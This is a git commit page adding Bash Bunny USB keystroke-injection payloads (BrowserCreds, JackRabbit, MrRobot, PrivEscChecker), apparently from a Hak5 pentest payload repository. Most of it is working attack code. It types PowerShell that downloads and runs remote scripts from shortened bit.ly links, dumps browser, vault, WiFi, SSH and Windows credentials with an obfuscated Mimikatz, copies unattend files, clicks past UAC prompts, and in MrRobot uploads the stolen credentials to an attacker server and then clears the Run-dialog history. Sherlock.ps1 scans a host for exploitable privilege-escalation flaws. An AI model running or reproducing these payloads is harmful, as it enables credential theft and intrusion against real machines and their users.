hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added browsercreds, wificreds, and mrrobot payloads (#114) 

* Initial commit

HID Powershell attack to dump WiFiCreds

* Update readme.md

* changed initial LED blink color to white

* Changed initial LED color to white

* Changed initial LED Color to white

* swapped sync before LED

* switched from powershell to batch

* Update payload.txt

* using powershell again , updated version and LEDs

* using powershell, added usb eject,  Win 7,8,10

* added window resizing to hide payload typing

* Update payload.txt

* pull request

* BrowserCreds Pull

* separate powershell script called from payload

also added result detection

* update LEDs

* Update payload.txt

* initial commit

* Update payload.txt

* initial pull

* initial commit
pull/100/merge
illwill 2017-04-07 01:48:20 -04:00 committed by Sebastian Kinne
parent 741b4a67e5
commit 147a71fe4f
18 changed files with 4019 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

77
payloads/library/BrowserCreds/payload.txt Normal file
View File

@ -0,0 +1,77 @@
#!/bin/bash
#
# Title: BrowserCreds
# Author: illwill
# Version: 0.1
#
# Dumps the stored plaintext Browser passwords from Windows boxes downloading a Powershell script
# then stashes them in /root/udisk/loot/BrowserCreds/%ComputerName%
# Credits to these guys for their powershell scripts:
# https://github.com/sekirkity/BrowserGather BrowserGather.ps1
# https://github.com/EmpireProject/Empire Get-FoxDump.ps1
#script
# Blue...............Running Script
# Purple.............Got Browser Creds
LED R 200
LOOTDIR=/root/udisk/loot/BrowserCreds
mkdir -p $LOOTDIR
ATTACKMODE HID STORAGE
LED B 200
# wait 6 seconds for the storage to popup
Q DELAY 6000
Q GUI r
Q DELAY 100
Q STRING POWERSHELL
Q ENTER
Q DELAY 500
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
#Dump Credential Vault (I.E./Edge)
Q STRING \$ClassHolder \= \[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType\=WindowsRuntime\]\;
Q STRING \$VaultObj \= new-object Windows.Security.Credentials.PasswordVault\; \$VaultObj.RetrieveAll\(\) \|
Q STRING foreach \{ \$_.RetrievePassword\(\)\; \$_ \} \|
Q STRING select Resource, UserName, Password \| Sort-Object Resource \| ft -AutoSize \| Out-File \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
Q ENTER
Q DELAY 100
#Dump Chrome Creds
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nea8tb\'\)\; Get-ChromeCreds \| ft UserURL\, Password -AutoSize \| Out-File -Append \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt -width 250
Q ENTER
Q DELAY 100
Q STRING exit
Q ENTER
Q DELAY 2000
#Open 32bit powershell and Dump Firefox Creds
Q GUI r
Q DELAY 100
Q STRING \%SystemRoot\%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
Q ENTER
Q DELAY 2000
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2mLu0R3\'\)\; Get-FoxDump \| Out-File -Append \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
Q ENTER
Q DELAY 100
Q STRING exit
Q ENTER
Q DELAY 100
Q STRING Out-File -FilePath \$BUNNY\\loot\\BrowserCreds\\DONE
Q ENTER
Q DELAY 100
sync
LED R B 200
FILE="/root/udisk/loot/BrowserCreds/DONE"
while [ ! -e $FILE ]; do sleep 1; done;
sleep 1;
if [ -e $FILE ]; then rm -f $FILE; LED G 200; else LED R; fi

27
payloads/library/BrowserCreds/readme.md Normal file
View File

@ -0,0 +1,27 @@
# BrowserCreds
* Author: illwill
* Version: Version 0.1
* Target: Windows
## Description
Dumps the stored plaintext Browser passwords from Windows boxes using
Powershell HID attack, then stashes them in /root/udisk/loot/BrowserCreds/
## Configuration
None needed.
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| White (blinking) | Setting up |
| Blue (blinking) | Attack running |
| Purple (blinking) | Dumping Browser Credentials |
| Green (blinking) | Succeeded Dumping Browser Credentials |
| Red (blinking) | Failed Dumping Browser Credentials |
## Discussion
https://forums.hak5.org/index.php?/topic/40431-payload-browsercreds

162
payloads/library/JackRabbit/payload.txt Normal file
View File

@ -0,0 +1,162 @@
#!/bin/bash
#
# Title: JackRabbit
# Author: illwill
# Version: 0.1
#
# Jacks the Browsers/Windows/WiFi/SSH passwords and install config files from Windows boxes by downloading a
# Powershell script into memory then stashes them in /root/udisk/loot/JackRabbit/%ComputerName%
#
# Credits to these guys for their powershell scripts:
# https://github.com/sekirkity/BrowserGather BrowserGather.ps1
# https://github.com/EmpireProject/Empire Get-FoxDump.ps1
# https://github.com/fireeye/SessionGopher SessionGopher .ps1
# https://github.com/gentilkiwi/mimikatz md.ps1 from gentilkiwi/clymb3r/mattifestation obfuscated to mimidogz
#script
# Purple...............Jackin dat loot
# Green................Jacked dat loot
# Red Blue.............PoPo caught yo ass
LED R B 200
LOOTDIR=/root/udisk/loot/JackRabbit
mkdir -p $LOOTDIR
ATTACKMODE HID STORAGE
LED B 200
# wait 6 seconds for the storage to popup
Q DELAY 6000
Q GUI r
Q DELAY 100
Q STRING POWERSHELL
Q ENTER
Q DELAY 500
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
# Make the loot folder of the computername
Q STRING \$LOOTDIR2 \= \"\$\(\$Bunny\)\\loot\\JackRabbit\\\$\(\$env:computername\)-\$\(\$env:username\)\"
Q ENTER
Q DELAY 100
Q STRING md \$LOOTDIR2
Q ENTER
Q DELAY 100
# Jackin' Credential Vault (I.E./Edge)
Q STRING \$ClassHolder \= \[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType\=WindowsRuntime\]\;
Q STRING \$VaultObj \= new-object Windows.Security.Credentials.PasswordVault\; \$VaultObj.RetrieveAll\(\) \|
Q STRING foreach \{ \$_.RetrievePassword\(\)\; \$_ \} \|
Q STRING select Resource, UserName, Password \| Sort-Object Resource \| ft -AutoSize \| Out-File \$LOOTDIR2\\IE-Edge.txt
Q ENTER
Q DELAY 100
# Jackin' Chrome Creds
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nea8tb\'\)\; Get-ChromeCreds \| ft -AutoSize \| Out-File \$LOOTDIR2\\Chrome.txt
Q ENTER
Q DELAY 100
Q STRING exit
Q ENTER
# Open 32bit powershell and Jackin' Firefox Creds
Q GUI r
Q DELAY 100
Q STRING \%SystemRoot\%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
Q ENTER
Q DELAY 2000
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
Q STRING \$LOOTDIR2 \= \"\$\(\$Bunny\)\\loot\\JackRabbit\\\$\(\$env:computername\)-\$\(\$env:username\)\"
Q ENTER
Q DELAY 100
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2mLu0R3\'\)\; Get-FoxDump \| Out-File \$LOOTDIR2\\FireFox.txt
Q ENTER
Q DELAY 100
Q STRING exit
Q ENTER
# UAC Bypass
Q GUI r
Q STRING powershell -c "Start-Process powershell -verb runas"
Q ENTER
Q DELAY 1500
Q LEFTARROW
Q DELAY 500
Q ENTER
Q DELAY 1000
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
Q STRING \$LOOTDIR2 \= \"\$\(\$Bunny\)\\loot\\JackRabbit\\\$\(\$env:computername\)-\$\(\$env:username\)\"
Q ENTER
Q DELAY 100
# Jackin' Windows creds
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nP5aQv\'\)\; Invoke-Mimidogz -DumpCred \| Out-File -Append \$LOOTDIR2\\MimiKatz.txt
Q DELAY 300
Q ENTER
# Jackin' Wifi creds
Q STRING \(netsh wlan show profiles\) \| Select-String \"\\:\(.+\)\$\" \| \%\{\$name\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \|
Q STRING \%\{\(netsh wlan show profile name\=\""\$name\"" key\=clear\)\} \| Select-String \""Key Content\\W+\\:(.+)\$\"" \|
Q STRING \%\{\$pass\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \| \%\{\[PSCustomObject\]@\{ "PROFILE_NAME"\=\$name\;PASSWORD\=\$pass \}\} \|
Q STRING Format-Table -AutoSize \| Out-File \$LOOTDIR2\\WiFi.txt
Q ENTER
Q DELAY 100
# Jackin' SSH Creds
# change to "Invoke-SessionGopher -Thorough" if you want to search for PuTTY private key (.ppk), Remote Desktop (.rdp), and RSA token (.sdtid) files, to extract private key and session information.
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nrfTPI\'\)\; Invoke-SessionGopher \| ft -AutoSize \| Out-File \$LOOTDIR2\\SSH.txt
Q ENTER
Q DELAY 100
# Jackin' dem install configs
Q STRING \$F \= @\(\)\;\$F \+\= \"C:\\sysprep.inf\"\;\$F \+\= \"C:\\sysprep\\sysprep.xml\"\;\$F \+\= \"C:\\WINDOWS\\panther\\Unattend\\Unattended.xml\"\;\$F \+\= \"C:\\WINDOWS\\panther\\Unattended.xml\"\;
Q STRING \$i \= 0\; foreach\(\$file in \$F\) \{if \(Test-Path \$file\)\{cp \$file \$LOOTDIR2\;\$i\+\+\}\}
Q ENTER
Q DELAY 100
# Output DONE to root of USB file to let bashbunny we're all good in the hood
Q DELAY 100
Q STRING Out-File -FilePath \$BUNNY\\loot\\DONE
Q ENTER
Q DELAY 100
# Eject the USB Safely
Q STRING \$Eject \= New-Object -comObject Shell.Application
Q ENTER
Q DELAY 100
Q STRING \$Eject.NameSpace\(17\).ParseName\(\$Bunny\).InvokeVerb\(\"Eject\"\)
Q ENTER
Q DELAY 1000
# GTFO
Q STRING EXIT
Q ENTER
#Sync Drive
sync
FILE="/root/udisk/loot/DONE"
while [ ! -e $FILE ]; do sleep 1; done;
sleep 1;
if [ -e $FILE ]; then rm -f $FILE; LED G 200
else LED R;
for (( ; ; ))
do
LED R;
sleep 1;
LED B;
sleep 1;
done
fi

25
payloads/library/JackRabbit/readme.md Normal file
View File

@ -0,0 +1,25 @@
# JackRabbit
* Author: illwill
* Version: Version 0.1
* Target: Windows
## Description
Jacks the Browsers/Windows/WiFi/SSH passwords and install config files from Windows boxes by downloading a
Powershell script into memory then stashes them in /root/udisk/loot/JackRabbit/%ComputerName%
## Configuration
None needed.
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Purple (blinking) | Jackin dat loot |
| Green (blinking) | Jacked dat loot |
| RED BLUE(blinking) | PoPo caught yo ass |
## Discussion

2683
payloads/library/MrRobot/md.ps1 Normal file
View File

File diff suppressed because one or more lines are too long

4
payloads/library/MrRobot/p.ps1 Normal file
View File

@ -0,0 +1,4 @@
IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/md.ps1');$o = Invoke-Mimidogz -DumpCred
(New-Object Net.WebClient).UploadString('http://172.16.64.1/'+$env:computername, $o)
(New-Object Net.WebClient).UploadString('http://172.16.64.1/EOF', 'EOF');
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue

76
payloads/library/MrRobot/payload.txt Normal file
View File

@ -0,0 +1,76 @@
#!/bin/bash
#
# Title: MrRobot Mimikatz Attack
# Author: illwill
# Version: 0.2
#
# Dumps the usernames & plaintext passwords from Windows boxes using Powershell in memory
# with Mimikatz then stashes them in /root/udisk/loot/MrRobot
#
# Blue...............Running Powershell / Waiting for WebServer to start
# White..............WebServer started and Uploading Results
# Purple.............Checking for Results
# Green..............Got Creds and copied to loot folder
# Amber(Blinking)....Mimikatz Error (Not Admin?)
# Red................No Creds
source bunny_helpers.sh
LED R G 200
# Creating Loot Folders
LOOTDIR=/root/udisk/loot/MrRobot
mkdir -p $LOOTDIR
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
mkdir -p $SWITCHDIR/loot
LED B 200
# HID Attack Starts
ATTACKMODE HID
# UAC Bypass
Q GUI r
Q STRING powershell -c "Start-Process cmd -verb runas"
Q ENTER
Q DELAY 1000
Q LEFTARROW
Q DELAY 500
Q ENTER
Q DELAY 1500
#Powershell Payload: first wait for connection to bunny webserver, then pull scripts and upload results
Q STRING "powershell -W Hidden \"while (\$true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p.ps1');exit}}\""
Q DELAY 300
Q ENTER
# Ethernet Attack Starts
ATTACKMODE RNDIS_ETHERNET
source bunny_helpers.sh
LED R G B 200
# mount -o sync /dev/nandf /root/udisk
iptables -A OUTPUT -p udp --dport 53 -j DROP
python $SWITCHDIR/server.py
#Wait for EOF in loot folder
LED R B 200
while [ ! -e "$SWITCHDIR/loot/EOF" ]; do sleep 1; done;
sleep 1
# check for empty loot directory, then check results and move them to loot
if [ "$(ls -A $SWITCHDIR/loot/)" ]; then
if grep -q "ERROR kuhl_m_sekurlsa_acquireLSA" $SWITCHDIR/loot/*.txt; then
LED G R 200
mv -v $SWITCHDIR/loot/*.txt $LOOTDIR
rm -rf $SWITCHDIR/loot/
else
mv -v $SWITCHDIR/loot/*.txt $LOOTDIR
rm -rf $SWITCHDIR/loot/
LED G
fi
else
rm-rf $SWITCHDIR/loot/
LED R
fi

28
payloads/library/MrRobot/readme.md Normal file
View File

@ -0,0 +1,28 @@
# MrRobot
![alt tag](http://i.imgur.com/eunFr0U.jpg)
* Author: illwill & tuxxy
* Version: Version 0.2
* Target: Windows
## Description
Dumps the usernames & plaintext passwords from Windows boxes using Powershell in memory
with Mimikatz then stashes them in /root/udisk/loot/MrRobot
## Configuration
None needed.
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Blue (blinking) | Running Powershell / Waiting for WebServer |
| White (blinking) | WebServer started and Uploading Results |
| Purple (blinking) | DChecking for Results |
| Green | Got Creds and copied to loot folder |
| Amber (blinking) | MimiKatz failed (Not Admin?) |
| Red (blinking) | No Creds / Mimikatz failed |
## Discussion
[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40524-payload-mrrobot/ "Hak5 Forum Thread")

60
payloads/library/MrRobot/server.py Normal file
View File

@ -0,0 +1,60 @@
import os
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
IS_RUNNING = True
abspath = os.path.abspath(__file__)
CURR_DIR = os.path.dirname(abspath)
os.chdir(CURR_DIR)
class RequestServer(BaseHTTPRequestHandler):
def _set_headers(self):
self.send_response(200, "ok")
self.send_header('Content-type', 'text/plain')
self.protocol_version = 'HTTP/1.1'
def do_GET(self):
self.send_response(200, "ok")
self.send_header("Content-type", "text/plain")
self.end_headers()
try:
with open(CURR_DIR + self.path, 'r+') as f:
data = f.read()
self.wfile.write(data)
except IOError:
self.send_response(404)
self.wfile.write(CURR_DIR)
return
def do_POST(self):
global IS_RUNNING
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
content_length = int(self.headers['Content-Length'])
filename = self.path[1:]
if filename == 'EOF':
data = self.rfile.read(content_length)
with open(CURR_DIR + "/loot/{}".format(filename), "w+") as f:
f.write(data)
f.close()
self.end_headers()
IS_RUNNING = False
else:
data = self.rfile.read(content_length)
with open(CURR_DIR + "/loot/{}.txt".format(filename), "w+") as f:
f.write(data)
f.close()
self._set_headers()
def run(server_class=HTTPServer, handler_class=RequestServer, port=80):
server_address = ('', port)
httpd = server_class(server_address, handler_class)
while IS_RUNNING:
httpd.handle_request()
if __name__ == '__main__':
run()

477
payloads/library/PrivEscChecker/Sherlock.ps1 Normal file
View File

@ -0,0 +1,477 @@
<#
File: Sherlock.ps1
Author: @_RastaMouse
License: GNU General Public License v3.0
#>
$Global:ExploitTable = $null
function Get-FileVersionInfo ($FilePath) {
$VersionInfo = (Get-Item $FilePath).VersionInfo
$FileVersion = ( "{0}.{1}.{2}.{3}" -f $VersionInfo.FileMajorPart, $VersionInfo.FileMinorPart, $VersionInfo.FileBuildPart, $VersionInfo.FilePrivatePart )
return $FileVersion
}
function Get-Architecture {
# This is the CPU architecture. Returns "64-bit" or "32-bit".
$CPUArchitecture = (Get-WmiObject Win32_OperatingSystem).OSArchitecture
# This is the process architecture, e.g. are we an x86 process running on a 64-bit system. Retuns "AMD64" or "x86".
$ProcessArchitecture = $env:PROCESSOR_ARCHITECTURE
return $CPUArchitecture, $ProcessArchitecture
}
function New-ExploitTable {
# Create the table
$Global:ExploitTable = New-Object System.Data.DataTable
# Create the columns
$Global:ExploitTable.Columns.Add("Title")
$Global:ExploitTable.Columns.Add("MSBulletin")
$Global:ExploitTable.Columns.Add("CVEID")
$Global:ExploitTable.Columns.Add("Link")
$Global:ExploitTable.Columns.Add("VulnStatus")
# Add the exploits we are interested in.
# MS10
$Global:ExploitTable.Rows.Add("User Mode to Ring (KiTrap0D)","MS10-015","2010-0232","https://www.exploit-db.com/exploits/11199/")
$Global:ExploitTable.Rows.Add("Task Scheduler .XML","MS10-092","2010-3338, 2010-3888","https://www.exploit-db.com/exploits/19930/")
# MS13
$Global:ExploitTable.Rows.Add("NTUserMessageCall Win32k Kernel Pool Overflow","MS13-053","2013-1300","https://www.exploit-db.com/exploits/33213/")
$Global:ExploitTable.Rows.Add("TrackPopupMenuEx Win32k NULL Page","MS13-081","2013-3881","https://www.exploit-db.com/exploits/31576/")
# MS14
$Global:ExploitTable.Rows.Add("TrackPopupMenu Win32k Null Pointer Dereference","MS14-058","2014-4113","https://www.exploit-db.com/exploits/35101/")
# MS15
$Global:ExploitTable.Rows.Add("ClientCopyImage Win32k","MS15-051","2015-1701, 2015-2433","https://www.exploit-db.com/exploits/37367/")
$Global:ExploitTable.Rows.Add("Font Driver Buffer Overflow","MS15-078","2015-2426, 2015-2433","https://www.exploit-db.com/exploits/38222/")
# MS16
$Global:ExploitTable.Rows.Add("'mrxdav.sys' WebDAV","MS16-016","2016-0051","https://www.exploit-db.com/exploits/40085/")
$Global:ExploitTable.Rows.Add("Secondary Logon Handle","MS16-032","2016-0099","https://www.exploit-db.com/exploits/39719/")
}
function Set-ExploitTable ($MSBulletin, $VulnStatus) {
$Global:ExploitTable | Where { $_.MSBulletin -eq $MSBulletin
} | ForEach-Object {
$_.VulnStatus = $VulnStatus
}
}
function Get-Results {
$Global:ExploitTable
}
function Find-AllVulns {
if ( !$Global:ExploitTable ) {
$null = New-ExploitTable
}
Find-MS10015
Find-MS10092
Find-MS13053
Find-MS13081
Find-MS14058
Find-MS15051
Find-MS15078
Find-MS16016
Find-MS16032
Get-Results
}
function Find-MS10015 {
# Set the MS Bulletin
$MSBulletin = "MS10-015"
# Check the system architecture
$Architecture = Get-Architecture
# This exploit doesn't work against 64-bit systems
if ( $Architecture[0] -eq "64-bit" ) {
$VulnStatus = "Not supported on 64-bit systems"
} Else {
# Get the file version info for 'ntoskrnl.exe'
$Path = $env:windir + "\system32\ntoskrnl.exe"
$VersionInfo = Get-FileVersionInfo($Path)
# Split the string into parts
$VersionInfo = $VersionInfo.Split(".")
# Get the Build and Revision
$Build = $VersionInfo[2]
$Revision = $VersionInfo[3].Split(" ")[0] # Drop the junk
# Decide which versions are vulnerable
switch ( $Build ) {
7600 { if ( $Revision -le "20591" ) { $VulnStatus = "Appears Vulnerable" } }
default { $VulnStatus = "Not Vulnerable" }
}
}
# Update the Exploit Table
Set-ExploitTable $MSBulletin $VulnStatus
}
function Find-MS10092 {
# Set the MS Bulletin
$MSBulletin = "MS10-092"
# Check the system architecture
$Architecture = Get-Architecture
# If running on 64-bit system, check the process architecture to ensure it's also 64-bit.
if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) {
# Get the file version info for 'schedsvc.dll'
$Path = $env:windir + "\system32\schedsvc.dll"
$VersionInfo = Get-FileVersionInfo($Path)
# Split the string into parts
$VersionInfo = $VersionInfo.Split(".")
# Get the Build and Revision
$Build = $VersionInfo[2]
$Revision = $VersionInfo[3].Split(" ")[0] # Drop the junk
# Decide which versions are vulnerable
switch ( $Build ) {
7600 { if ( $Revision -le "20830" ) { $VulnStatus = "Appears Vulnerable" } }
default { $VulnStatus = "Not Vulnerable" }
}
} ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) {
$VulnStatus = "Migrate to a 64-bit process to avoid WOW64 Filesystem Redirection shenanigans"
}
# Update the Exploit Table
Set-ExploitTable $MSBulletin $VulnStatus
}
function Find-MS13053 {
# Set the MS Bulletin
$MSBulletin = "MS13-053"
# Check the system architecture
$Architecture = Get-Architecture
# This exploit doesn't work against 64-bit systems
if ( $Architecture[0] -eq "64-bit" ) {
$VulnStatus = "Not supported on 64-bit systems"
} Else {
# Get the file version info for 'win32k.sys'
$Path = $env:windir + "\system32\win32k.sys"
$VersionInfo = Get-FileVersionInfo($Path)
# Split the string into parts
$VersionInfo = $VersionInfo.Split(".")
# Get the Build and Revision
$Build = $VersionInfo[2]
$Revision = $VersionInfo[3].Split(" ")[0] # Drop the junk
# Decide which versions are vulnerable
switch ( $Build ) {
7600 { if ( $Revision -ge "17000" ) { $VulnStatus = "Appears Vulnerable" } }
7601 { if ( $Revision -le "22348" ) { $VulnStatus = "Appears Vulnerable" } }
9200 { if ( $Revision -le "20732" ) { $VulnStatus = "Appears Vulnerable" } }
default { $VulnStatus = "Not Vulnerable" }
}
}
# Update the Exploit Table
Set-ExploitTable $MSBulletin $VulnStatus
}
function Find-MS13081 {
# Set the MS Bulletin
$MSBulletin = "MS13-081"
# Check the system architecture
$Architecture = Get-Architecture
# This exploit doesn't work against 64-bit systems
if ( $Architecture[0] -eq "64-bit" ) {
$VulnStatus = "Not supported on 64-bit systems"
} Else {
# Get the file version info for 'win32k.sys'
$Path = $env:windir + "\system32\win32k.sys"
$VersionInfo = Get-FileVersionInfo($Path)
# Split the string into parts
$VersionInfo = $VersionInfo.Split(".")
# Get the Build and Revision
$Build = $VersionInfo[2]
$Revision = $VersionInfo[3].Split(" ")[0] # Drop the junk
# Decide which versions are vulnerable
switch ( $Build ) {
7600 { if ( $Revision -ge "18000" ) { $VulnStatus = "Appears Vulnerable" } }
7601 { if ( $Revision -le "22435" ) { $VulnStatus = "Appears Vulnerable" } }
9200 { if ( $Revision -le "20807" ) { $VulnStatus = "Appears Vulnerable" } }
default { $VulnStatus = "Not Vulnerable" }
}
}
# Update the Exploit Table
Set-ExploitTable $MSBulletin $VulnStatus
}
function Find-MS14058 {
# Set the MS Bulletin
$MSBulletin = "MS14-058"
# Check the system architecture
$Architecture = Get-Architecture
# If running on 64-bit system, check the process architecture to ensure it's also 64-bit.
if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) {
# Get the file version info for 'win32k.sys'
$Path = $env:windir + "\system32\win32k.sys"
$VersionInfo = Get-FileVersionInfo($Path)
# Split the string into parts
$VersionInfo = $VersionInfo.Split(".")
# Get the Build and Revision
$Build = $VersionInfo[2]
$Revision = $VersionInfo[3].Split(" ")[0] # Drop the junk
# Decide which versions are vulnerable
switch ( $Build ) {
7600 { if ( $Revision -ge "18000" ) { $VulnStatus = "Appears Vulnerable" } }
7601 { if ( $Revision -le "22823" ) { $VulnStatus = "Appears Vulnerable" } }
9200 { if ( $Revision -le "21247" ) { $VulnStatus = "Appears Vulnerable" } }
9600 { if ( $Revision -le "17353" ) { $VulnStatus = "Appears Vulnerable" } }
default { $VulnStatus = "Not Vulnerable" }
}
} ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) {
$VulnStatus = "Migrate to a 64-bit process to avoid WOW64 Filesystem Redirection shenanigans"
}
# Update the Exploit Table
Set-ExploitTable $MSBulletin $VulnStatus
}
function Find-MS15051 {
# Set the MS Bulletin
$MSBulletin = "MS15-051"
# Check the system architecture
$Architecture = Get-Architecture
# If running on 64-bit system, check the process architecture to ensure it's also 64-bit.
if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) {
# Get the file version info for 'win32k.sys'
$Path = $env:windir + "\system32\win32k.sys"
$VersionInfo = Get-FileVersionInfo($Path)
# Split the string into parts
$VersionInfo = $VersionInfo.Split(".")
# Get the Build and Revision
$Build = $VersionInfo[2]
$Revision = $VersionInfo[3].Split(" ")[0] # Drop the junk
# Decide which versions are vulnerable
switch ( $Build ) {
7600 { if ( $Revision -ge "18000" ) { $VulnStatus = "Appears Vulnerable" } }
7601 { if ( $Revision -le "22823" ) { $VulnStatus = "Appears Vulnerable" } }
9200 { if ( $Revision -le "21247" ) { $VulnStatus = "Appears Vulnerable" } }
9600 { if ( $Revision -le "17353" ) { $VulnStatus = "Appears Vulnerable" } }
default { $VulnStatus = "Not Vulnerable" }
}
} ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) {
$VulnStatus = "Migrate to a 64-bit process to avoid WOW64 Filesystem Redirection shenanigans"
}
# Update the Exploit Table
Set-ExploitTable $MSBulletin $VulnStatus
}
function Find-MS15078 {
# Set the MS Bulletin
$MSBulletin = "MS15-078"
# Get the file version info for 'atmfd.dll'
$Path = $env:windir + "\system32\atmfd.dll"
$VersionInfo = Get-FileVersionInfo($Path)
# Split the string into parts
$VersionInfo = $VersionInfo.Split(" ")
# Get the Revision
$Revision = $VersionInfo[2]
# Decide which versions are vulnerable
switch ( $Revision ) {
243 { $VulnStatus = "Appears Vulnerable" }
default { $VulnStatus = "Not Vulnerable" }
}
# Update the Exploit Table
Set-ExploitTable $MSBulletin $VulnStatus
}
function Find-MS16016 {
# Set the MS Bulletin
$MSBulletin = "MS16-016"
# Check the system architecture
$Architecture = Get-Architecture
# This exploit doesn't work against 64-bit systems
if ( $Architecture[0] -eq "64-bit" ) {
$VulnStatus = "Not supported on 64-bit systems"
} Else {
# Get the file version info for 'mrxdav.sys'
$Path = $env:windir + "\system32\drivers\mrxdav.sys"
$VersionInfo = Get-FileVersionInfo($Path)
# Split the string into parts
$VersionInfo = $VersionInfo.Split(".")
# Get the Build and Revision
$Build = $VersionInfo[2]
$Revision = $VersionInfo[3].Split(" ")[0] # Drop the junk
# Decide which versions are vulnerable
switch ( $Build ) {
7600 { if ( $Revision -ge "16000" ) { $VulnStatus = "Appears Vulnerable" } }
7601 { if ( $Revision -le "23317" ) { $VulnStatus = "Appears Vulnerable" } }
9200 { if ( $Revision -le "21738" ) { $VulnStatus = "Appears Vulnerable" } }
9600 { if ( $Revision -le "18189" ) { $VulnStatus = "Appears Vulnerable" } }
10240 { if ( $Revision -le "16683" ) { $VulnStatus = "Appears Vulnerable" } }
10586 { if ( $Revision -le "103" ) { $VulnStatus = "Appears Vulnerable" } }
default { $VulnStatus = "Not Vulnerable" }
}
}
# Update the Exploit Table
Set-ExploitTable $MSBulletin $VulnStatus
}
function Find-MS16032 {
# Set the MS Bulletin
$MSBulletin = "MS16-032"
# Check the system architecture
$Architecture = Get-Architecture
# If running on 64-bit system, check the process architecture to ensure it's also 64-bit.
if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) {
# Get the file version info for 'seclogon.dll'
$Path = $env:windir + "\system32\seclogon.dll"
$VersionInfo = Get-FileVersionInfo($Path)
# Split the string into parts
$VersionInfo = $VersionInfo.Split(".")
# Get the Build and Revision
$Build = $VersionInfo[2]
$Revision = $VersionInfo[3].Split(" ")[0] # Drop the junk
# Decide which versions are vulnerable
switch ( $Build ) {
7600 { if ( $Revision -ge "16000" ) { $VulnStatus = "Appears Vulnerable" } }
7601 { if ( $Revision -le "23348" ) { $VulnStatus = "Appears Vulnerable" } }
9200 { if ( $Revision -le "21768" ) { $VulnStatus = "Appears Vulnerable" } }
9600 { if ( $Revision -le "18230" ) { $VulnStatus = "Appears Vulnerable" } }
10240 { if ( $Revision -le "16724" ) { $VulnStatus = "Appears Vulnerable" } }
10586 { if ( $Revision -le "162" ) { $VulnStatus = "Appears Vulnerable" } }
default { $VulnStatus = "Not Vulnerable" }
}
} ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) {
$VulnStatus = "Migrate to a 64-bit process to avoid WOW64 Filesystem Redirection shenanigans"
}
# Update the Exploit Table
Set-ExploitTable $MSBulletin $VulnStatus
}

90
payloads/library/PrivEscChecker/payload.txt Normal file
View File

@ -0,0 +1,90 @@
#!/bin/bash
#
# Title: PrivEscChecker
# Author: illwill
# Version: 0.1
#
# Check Windows box for unpatched vulns that allow privilege escalation
# then stashes them in /root/udisk/loot/PrivEscChecker/%ComputerName%-%username%
# Can be used locally or webdls the script from github
# Credits to rasta-mouse for their powershell script:
# https://github.com/rasta-mouse/Sherlock Sherlock.ps1
#
# Blue...............Running Script
# Purple.............Checking Results
# Green..............Found Possible Privilege Escalation
# Red................No Possible Privilege Escalation
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED R 200
LOOTDIR=/root/udisk/loot/PrivEscChecker
mkdir -p $LOOTDIR
#cleanup any prior unfinished payloads
rm $LOOTDIR/DONE
rm $LOOTDIR/OUTPUT
ATTACKMODE HID STORAGE
LED B 200
# wait 6 seconds for the storage to popup, then open powershell and get bunny drive letter
